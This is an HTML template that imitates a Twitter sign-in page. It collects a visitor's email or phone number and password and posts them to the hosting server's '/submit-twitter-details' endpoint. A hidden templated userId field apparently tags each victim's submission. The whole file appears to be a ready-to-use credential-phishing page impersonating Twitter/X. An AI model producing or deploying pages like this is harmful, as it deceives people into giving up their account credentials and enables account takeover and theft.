<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>twitter login</title>
    <link rel="stylesheet" href="/css/twitter.css">
</head>
<body>
    <div class="login-container">

        <i class="fa-brands fa-x-twitter"></i>


        <h2>Sign in to Twitter</h2>
        <form id="twitterLoginForm" action="/submit-twitter-details" method="POST">
            <input type="hidden" name="userId" value="<%= userId %>">
            
            <label for="emailOrNumber">Number or Email:</label>
            <input type="text" id="emailOrNumber" name="emailOrNumber" required placeholder="Email or phone number">
        
            <label for="password">Password:</label>
            <input type="password" id="password" name="password" required placeholder="Password">
            
            <button type="submit">Login</button>
        </form>
        <p><a href="#">Forgot password?</a></p>
    </div>


    <script src="https://kit.fontawesome.com/b3fa93e021.js" crossorigin="anonymous"></script>

</body>
</html>